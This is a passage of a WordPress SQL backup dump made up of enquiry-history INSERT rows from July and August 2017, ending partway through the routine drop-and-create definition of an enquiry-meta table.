INSERT INTO `wp_enquiry_history` VALUES (1175, 1175, '2017-07-01 04:30:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1176, 1176, '2017-07-01 04:37:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1177, 1177, '2017-07-01 12:39:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1178, 1178, '2017-07-01 18:05:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1179, 1179, '2017-07-02 14:51:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1180, 1180, '2017-07-03 03:23:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1181, 1181, '2017-07-03 13:38:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1182, 1182, '2017-07-03 17:23:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1183, 1183, '2017-07-03 17:58:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1184, 1184, '2017-07-04 20:50:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1185, 1185, '2017-07-04 21:11:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1186, 1186, '2017-07-05 03:44:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1187, 1187, '2017-07-05 04:27:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1188, 1188, '2017-07-05 12:06:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1189, 1189, '2017-07-05 13:33:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1190, 1190, '2017-07-05 15:24:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1191, 1191, '2017-07-05 21:17:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1192, 1192, '2017-07-05 22:32:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1193, 1193, '2017-07-05 22:58:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1194, 1194, '2017-07-06 11:35:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1195, 1195, '2017-07-06 12:11:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1196, 1196, '2017-07-06 14:48:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1197, 1197, '2017-07-06 15:51:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1198, 1198, '2017-07-06 16:34:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1199, 1199, '2017-07-06 18:43:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1200, 1200, '2017-07-06 19:08:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1201, 1201, '2017-07-06 21:00:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1202, 1202, '2017-07-06 23:24:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1203, 1203, '2017-07-07 05:13:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1204, 1204, '2017-07-07 14:34:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1205, 1205, '2017-07-07 18:11:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1206, 1206, '2017-07-07 20:57:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1207, 1207, '2017-07-07 21:31:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1208, 1208, '2017-07-08 01:29:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1209, 1209, '2017-07-10 05:35:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1210, 1210, '2017-07-10 05:41:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1211, 1211, '2017-07-10 16:35:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1212, 1212, '2017-07-10 17:20:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1213, 1213, '2017-07-10 17:30:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1214, 1214, '2017-07-10 19:24:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1215, 1215, '2017-07-10 19:42:52', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1216, 1216, '2017-07-10 20:56:05', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1217, 1217, '2017-07-10 21:52:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1218, 1218, '2017-07-11 10:25:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1219, 1219, '2017-07-11 11:15:15', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1220, 1220, '2017-07-11 12:07:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1221, 1221, '2017-07-11 15:59:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1222, 1222, '2017-07-11 17:51:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1223, 1223, '2017-07-11 21:22:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1224, 1224, '2017-07-12 00:52:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1225, 1225, '2017-07-12 15:22:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1226, 1226, '2017-07-12 18:01:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1227, 1227, '2017-07-12 20:04:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1228, 1228, '2017-07-13 16:19:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1229, 1229, '2017-07-14 08:48:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1230, 1230, '2017-07-14 16:34:35', '-', 'Requested', 361); 
INSERT INTO `wp_enquiry_history` VALUES (1231, 1231, '2017-07-14 20:13:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1232, 1232, '2017-07-14 23:03:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1233, 1233, '2017-07-15 10:49:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1234, 1234, '2017-07-16 18:01:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1235, 1235, '2017-07-17 00:46:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1236, 1236, '2017-07-17 13:09:52', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1237, 1237, '2017-07-17 15:16:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1238, 1238, '2017-07-17 15:43:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1239, 1239, '2017-07-17 17:25:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1240, 1240, '2017-07-17 17:37:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1241, 1241, '2017-07-17 18:34:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1242, 1242, '2017-07-17 23:10:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1243, 1243, '2017-07-18 08:34:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1244, 1244, '2017-07-18 13:49:10', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1245, 1245, '2017-07-18 14:03:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1246, 1246, '2017-07-18 17:18:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1247, 1247, '2017-07-18 17:28:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1248, 1248, '2017-07-18 20:53:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1249, 1249, '2017-07-18 21:38:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1250, 1250, '2017-07-18 23:15:30', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1251, 1251, '2017-07-19 11:53:10', '-', 'Requested', 1793); 
INSERT INTO `wp_enquiry_history` VALUES (1252, 1252, '2017-07-19 14:24:18', '-', 'Requested', 1800); 
INSERT INTO `wp_enquiry_history` VALUES (1253, 1253, '2017-07-19 14:58:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1254, 1254, '2017-07-19 15:20:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1255, 1255, '2017-07-19 15:58:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1256, 1256, '2017-07-19 16:20:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1257, 1257, '2017-07-19 18:41:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1258, 1258, '2017-07-19 20:51:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1259, 1259, '2017-07-19 21:37:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1260, 1260, '2017-07-20 00:54:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1261, 1261, '2017-07-20 13:15:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1262, 1262, '2017-07-20 18:32:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1263, 1263, '2017-07-20 20:31:28', '-', 'Requested', 1827); 
INSERT INTO `wp_enquiry_history` VALUES (1264, 1264, '2017-07-20 22:43:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1265, 1265, '2017-07-21 05:08:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1266, 1266, '2017-07-21 14:22:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1267, 1267, '2017-07-21 14:24:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1268, 1268, '2017-07-21 16:25:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1269, 1269, '2017-07-21 18:39:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1270, 1270, '2017-07-21 18:59:51', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1271, 1271, '2017-07-22 21:09:00', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1272, 1272, '2017-07-23 10:21:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1273, 1273, '2017-07-23 10:57:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1274, 1274, '2017-07-24 01:18:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1275, 1275, '2017-07-24 13:50:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1276, 1276, '2017-07-24 20:10:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1277, 1277, '2017-07-25 03:03:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1278, 1278, '2017-07-25 14:08:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1279, 1279, '2017-07-25 15:52:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1280, 1280, '2017-07-25 16:20:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1281, 1281, '2017-07-26 08:13:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1282, 1282, '2017-07-26 08:30:10', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1283, 1283, '2017-07-26 15:00:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1284, 1284, '2017-07-26 16:14:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1285, 1285, '2017-07-26 17:31:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1286, 1286, '2017-07-26 18:02:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1287, 1287, '2017-07-26 20:23:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1288, 1288, '2017-07-26 20:28:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1289, 1289, '2017-07-26 20:53:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1290, 1290, '2017-07-26 20:57:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1291, 1291, '2017-07-26 22:44:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1292, 1292, '2017-07-27 13:26:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1293, 1293, '2017-07-27 18:56:05', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (1294, 1294, '2017-07-27 18:58:30', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (1295, 1295, '2017-07-28 12:45:31', '-', 'Requested', 361); 
INSERT INTO `wp_enquiry_history` VALUES (1296, 1296, '2017-07-28 15:09:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1297, 1297, '2017-07-28 16:02:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1298, 1298, '2017-07-28 21:39:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1299, 1299, '2017-07-29 21:27:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1300, 1300, '2017-07-30 17:43:08', '-', 'Requested', 2000); 
INSERT INTO `wp_enquiry_history` VALUES (1301, 1301, '2017-07-31 07:42:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1302, 1302, '2017-07-31 12:53:53', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1303, 1303, '2017-07-31 12:57:18', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1304, 1304, '2017-07-31 12:58:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1305, 1305, '2017-07-31 13:02:34', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1306, 1306, '2017-07-31 13:15:18', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1307, 1307, '2017-07-31 13:17:44', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1308, 1308, '2017-07-31 13:29:42', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1309, 1309, '2017-07-31 13:50:36', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1310, 1310, '2017-07-31 13:59:20', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1311, 1311, '2017-07-31 13:59:41', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (1312, 1312, '2017-07-31 16:38:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1313, 1313, '2017-07-31 19:34:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1314, 1314, '2017-07-31 20:41:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1315, 1315, '2017-07-31 22:49:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1316, 1316, '2017-08-01 14:09:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1317, 1317, '2017-08-01 16:19:14', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1318, 1318, '2017-08-01 21:44:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1319, 1319, '2017-08-01 21:53:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1320, 1320, '2017-08-01 22:18:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1321, 1321, '2017-08-01 22:59:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1322, 1322, '2017-08-02 10:58:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1323, 1323, '2017-08-02 11:39:43', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1324, 1324, '2017-08-02 13:01:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1325, 1325, '2017-08-02 15:50:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1326, 1326, '2017-08-02 15:56:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1327, 1327, '2017-08-02 17:33:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1328, 1328, '2017-08-02 18:35:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1329, 1329, '2017-08-02 19:41:56', '-', 'Requested', 2083); 
INSERT INTO `wp_enquiry_history` VALUES (1330, 1330, '2017-08-03 00:36:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1331, 1331, '2017-08-03 08:01:48', '-', 'Requested', 2096); 
INSERT INTO `wp_enquiry_history` VALUES (1332, 1332, '2017-08-03 08:03:52', '-', 'Requested', 2096); 
INSERT INTO `wp_enquiry_history` VALUES (1333, 1333, '2017-08-03 08:04:12', '-', 'Requested', 2096); 
INSERT INTO `wp_enquiry_history` VALUES (1334, 1334, '2017-08-03 12:34:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1335, 1335, '2017-08-03 12:39:31', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (1336, 1336, '2017-08-03 12:51:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1337, 1337, '2017-08-03 14:25:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1338, 1338, '2017-08-03 14:40:46', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1339, 1339, '2017-08-03 15:58:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1340, 1340, '2017-08-03 19:17:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1341, 1341, '2017-08-03 20:29:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1342, 1342, '2017-08-03 21:49:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1343, 1343, '2017-08-03 21:54:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1344, 1344, '2017-08-03 22:44:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1345, 1345, '2017-08-04 13:11:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1346, 1346, '2017-08-04 15:00:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1347, 1347, '2017-08-04 18:40:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1348, 1348, '2017-08-04 18:57:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1349, 1349, '2017-08-04 19:01:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1350, 1350, '2017-08-04 21:15:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1351, 1351, '2017-08-06 18:51:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1352, 1352, '2017-08-07 15:36:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1353, 1353, '2017-08-07 22:33:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1354, 1354, '2017-08-07 22:43:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1355, 1355, '2017-08-08 13:48:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1356, 1356, '2017-08-08 15:15:52', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1357, 1357, '2017-08-08 15:52:05', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1358, 1358, '2017-08-08 16:45:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1359, 1359, '2017-08-08 18:04:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1360, 1360, '2017-08-08 19:30:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1361, 1361, '2017-08-08 21:06:52', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1362, 1362, '2017-08-09 10:08:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1363, 1363, '2017-08-09 11:33:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1364, 1364, '2017-08-09 12:42:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1365, 1365, '2017-08-09 13:21:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1366, 1366, '2017-08-09 18:05:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1367, 1367, '2017-08-10 06:11:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1368, 1368, '2017-08-10 10:30:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1369, 1369, '2017-08-10 11:58:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1370, 1370, '2017-08-10 12:20:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1371, 1371, '2017-08-10 13:12:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1372, 1372, '2017-08-10 16:50:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1373, 1373, '2017-08-10 20:56:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1374, 1374, '2017-08-10 21:15:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1375, 1375, '2017-08-11 01:57:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1376, 1376, '2017-08-11 15:54:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1377, 1377, '2017-08-11 17:14:30', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1378, 1378, '2017-08-11 18:56:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1379, 1379, '2017-08-11 18:57:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1380, 1380, '2017-08-11 19:11:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1381, 1381, '2017-08-11 20:23:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1382, 1382, '2017-08-11 20:39:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1383, 1383, '2017-08-14 06:54:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1384, 1384, '2017-08-14 14:38:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1385, 1385, '2017-08-14 16:44:00', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1386, 1386, '2017-08-14 17:39:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1387, 1387, '2017-08-14 18:13:10', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1388, 1388, '2017-08-14 19:14:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1389, 1389, '2017-08-15 07:44:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1390, 1390, '2017-08-15 13:01:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1391, 1391, '2017-08-15 13:48:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1392, 1392, '2017-08-15 17:20:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1393, 1393, '2017-08-15 19:17:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1394, 1394, '2017-08-15 20:01:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1395, 1395, '2017-08-15 20:36:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1396, 1396, '2017-08-15 21:30:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1397, 1397, '2017-08-15 23:46:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1398, 1398, '2017-08-16 00:47:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1399, 1399, '2017-08-16 13:14:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1400, 1400, '2017-08-16 16:40:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1401, 1401, '2017-08-16 17:48:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1402, 1402, '2017-08-17 12:24:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1403, 1403, '2017-08-17 12:54:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1404, 1404, '2017-08-17 12:57:51', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1405, 1405, '2017-08-17 13:58:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1406, 1406, '2017-08-17 17:06:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1407, 1407, '2017-08-17 18:48:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1408, 1408, '2017-08-17 22:47:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1409, 1409, '2017-08-18 18:27:45', '-', 'Requested', 2461); 
INSERT INTO `wp_enquiry_history` VALUES (1410, 1410, '2017-08-18 19:23:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1411, 1411, '2017-08-19 17:08:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1412, 1412, '2017-08-19 17:11:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1413, 1413, '2017-08-19 17:17:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1414, 1414, '2017-08-21 06:40:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1415, 1415, '2017-08-21 14:16:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1416, 1416, '2017-08-21 16:32:11', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1417, 1417, '2017-08-21 16:47:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1418, 1418, '2017-08-21 17:49:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1419, 1419, '2017-08-21 18:45:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1420, 1420, '2017-08-21 20:09:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1421, 1421, '2017-08-21 23:29:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1422, 1422, '2017-08-22 09:30:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (1423, 1423, '2017-08-22 11:26:56', '-', 'Requested', NULL);
#
# End of data contents of table `wp_enquiry_history`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_meta`


#
# Delete any existing table `wp_enquiry_meta`
#

DROP TABLE IF EXISTS `wp_enquiry_meta`;


#
# Table structure of table `wp_enquiry_meta`
#

CREATE TABLE `wp_enquiry_meta` (
  `meta_id` int(11) NOT NULL AUTO_INCREMENT,
  `enquiry_id` int(11) DEFAULT NULL,
  `meta_key` varchar(500) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` varchar(500) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
